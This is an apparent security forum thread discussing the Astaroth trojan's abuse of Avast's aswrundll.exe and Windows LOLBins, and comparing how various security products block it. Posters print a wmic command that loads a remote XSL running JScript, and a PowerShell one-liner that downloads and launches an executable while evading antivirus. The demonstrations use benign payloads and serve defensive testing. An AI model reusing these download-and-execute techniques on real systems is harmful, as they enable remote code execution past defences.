This Trojan exploits antivirus software to steal your data

[Andy Ful]

Update February 13 2019 20:00 EST:...
One important thing to consider is that this is neither an injection nor a privilege escalation.
Installed Avast binaries have self-protection mechanisms in place to avoid injections. In this instance, they are using an Avast file to run a binary in a similar way that a DLL using Windows’ rundll32.exe can run. ...
[/QUOTE]
The above Avast explanation is not exactly true. It is true for the first DLL payload (lrdsnhrxxxfery64), but the next payload (lrdsnhrxxxfery98) is injected to aswrundll.exe . The truth is that aswrundll.exe is a simple tool to run DLLs, it is not installed and protected by Avast. It has not got any self-protection mechanism, too.
The truth is also, that Avast introduced the new vector of attack, similar to rundll32.exe.

Edit.
To be honest, that does not matter at all, for the average Avast customer. Such a vector of attack is only harder to uncover by more advanced user.

 

[legendcampos]

As I said earlier, in my country millions of Brazilians receive these malicious emails usually they already fall into the spam filter but some cases do not. The email arrives in the form of billing or account cancellation in this example of the image I have no account at Bank Santander and yet I received, already in the second image is the test link of the total virus site and the only antivirus that detected was Kaspersky.




Vírus Total

 

[Moonhorse]

As I said earlier, in my country millions of Brazilians receive these malicious emails usually they already fall into the spam filter but some cases do not. The email arrives in the form of billing or account cancellation in this example of the image I have no account at Banco Santander and yet I received, already in the second image is the test link of the total virus site and the only antivirus that detected was Kaspersky.
View attachment 208667

View attachment 208668

Vírus Total

Malwarebytes blocked it ( extension) and i cant even connect to that site, probably netcraft blocking it aswell

 

[ForgottenSeer 72227]

The problem with Windows Defender is that it is easy to turn off, not that it is easy to abuse. I would rather have an AV that is turned off than an AV that is being used as a weapon against me.

I agree! Thankfully with the next major release of W10 they are adding tamper protection, so this issue may be resolved in the near future.

 

[boombastik]

Yes the tamper protection will be great addition. The detection rates are good. The average user will be happy.

 

[Andy Ful]

Yes the tamper protection will be great addition. The detection rates are good. The average user will be happy.

That it will be important, especially in organizations and enterprises. The WD Advanced Threat Protection (Exploit Guard, AppLocker, Credential Guard, etc.) is prepared to fight/mitigate the malware with Administrator rights. It is logical that this should be also extended to protect the WD settings.

The home users do not have such protection in Windows Home or Pro. If the malware managed to elevate, then with or without Tamper Protection, the user is already heavily infected.

 

[Andy Ful]

I was curious if wmic.exe that is related to the WMI service (winmgmt), can be blocked by the firewall rule. It is somewhat similar to the bitsadmin.exe that is related to the BITS service.
I used the known testing command line from LOLBins:

wmic process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"

I had to turn off the WD real-protection, because WD blocked that command line.
The Wmic_calc.xsl code runs calculator.exe:

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]> </ms:script>
</stylesheet>

I confirmed that in this case the firewall block rule works well. The difference can be seen when using NirSoft TcpLogView tool. In the case of downloading by bitsadmin, there is no bitsadmin process visible, but only svchost.exe . In the case of wmic, the wmic.exe process is present.

 

[Wraith]

Child processes of what?
This malware does not run any installed application, but directly execute wmic.exe when the user clicked on the shortcut.

Does this mean that standard anti executables like Exe Radar Pro, Voodoo Shield, AppGuard can be bypassed?

 

[Andy Ful]

That will depend on configuration. Any anti-exe security can stop that malware if it can alert the user on execution of wmic.exe. The malware can also be mitigated when bitsadmin.exe is alerted. The final injection can be prevented when regsvr32.exe and asvrundll.exe are alerted.

If I correctly remember, the wmic.exe is added in AppGuard to Guarded applications in default settings, but I am not sure if this can stop that malware, because the injection is made to wmic.exe child processes. AppGuard memory protection prevents injections to external processes. That malware is the spying software and the password stealer - it does not change the system.
But, adding wmic.exe to the User Space (recommended) will stop that malware, for sure.

 

[ForgottenSeer 69673]

Here is how I have Appguard setup. I have had it so long, I can't remember if it came default of I added it to user space. I also always run in locked down mode.

 

[Hollow]

New viruses are created to compromise the antivirus and after only it starts doing the work

 

[Wraith]

It is sufficient for this malware and some more. But WD ASR can be possibly bypassed on Windows Home and Pro by PowerShell, for example:

powershell Import-Module bitstransfer;Start-BitsTransfer 'https://kcsoftwares.com/files/sumo_lite.exe' $home\Downloads\sumo_lite.exe;$filepath = $HOME + '\Downloads\sumo_lite.exe'; Invoke-WmiMethod -class win32_Process -Name Create -ArgumentList $filepath

Create the shortcut with this command and click the shortcut. It should download and execute the known & legal & useful SUMo installer. This should also bypass most AVs (anti-script modules).
The SUMo webpage:

KC Softwares

KC Softwares - Software Development Company

www.kcsoftwares.com

Today I was trying out this shortcut since I had some free time and the results were impressive. Firstly it went right past the ESET HIPS(block execution of bitsadmin) and Firewall Module(deny network connection for bitsadmin).
Secondly OSArmor immediately stopped the script with a warning block execution of remote downloaded scripts or something like that and the script was unable to download anything.
Thirdly AppGuard showed me a warning when executing the script but the script still managed to download sumo which was blocked by AppGuard on execution.
While these are not true tests in this scenario the best protection is offered by OSArmor since it prevented the script from remotely downloading. AppGuard comes second since it blocked the execution of the final payload(in this case the installer). But since astaroth does not execute in this manner I don't know if the final payload would have been blocked by AppGuard.
@Andy Ful thanks a lot for this since I have learnt a lot about lolbins. I have H_C in my Win 10 laptop and it's just absolutely an amazing piece of software.

 

[shmu26]

Today I was trying out this shortcut since I had some free time and the results were impressive. Firstly it went right past the ESET HIPS(block execution of bitsadmin) and Firewall Module(deny network connection for bitsadmin).
Secondly OSArmor it immediately stopped the script with a warning block execution of remote downloaded scripts or something like that and the script was unable to download anything.
Thirdly AppGuard showed me a warning when executing the script but the script still managed to download sumo which was blocked by AppGuard on execution.
While these are not true tests in this scenario the best protection is offered by OSArmor since it prevented the script from remotely downloading. AppGuard comes second since it blocked the execution of the final payload(in this case the installer). But since astaroth does not execute in this manner I don't know if the final payload would have been blocked by AppGuard.
@Andy Ful thanks a lot for this since I have learnt a lot about lolbins. I have H_C in my Windows 10 laptop and it's just absolutely an amazing piece of software.

Most Appguard users tweak the default config in order to improve the powershell protection and general script protection. The default config is kind of wishy-washy, it is designed as a generic config that won't aggravate the IT guys running business networks that need to run VBS scripts and stuff like that.

As for bypassing ESET HIPS, it looks like hacker Andy didn't invoke bitsadmin, he went straight for the jugular with the BITS downloader.

 

[Wraith]

Most Appguard users tweak the default config in order to improve the powershell protection and general script protection. The default config is kind of wishy-washy, it is designed as a generic config that won't aggravate the IT guys running business networks that need to run VBS scripts and stuff like that.

As for bypassing ESET HIPS, it looks like hacker Andy didn't invoke bitsadmin, he went straight for the jugular with the BITS downloader.

While I didn't customise AG too much, I did add PowerShell to Guarded Applications and added cscript, wscript, mshta to userspace.

 

[shmu26]

While I didn't customise AG too much, I did add PowerShell to Guarded Applications and added cscript, wscript to userspace.

cscript, wscript to userspace -- this is correct. You can do even better than that, by adding *script.exe to userspace. Of course, make sure you selected userspace: YES.

Adding Powershell to guarded applications is wishy-washy. That's why you got the results you did. The strong way to do is to add *powershell* to userspace: YES and also to remove powershell from guarded apps. You can just untick it, you don't have to delete it.
If you skip this second step, powershell will run, but it will run guarded. In this case, it can do limited damage.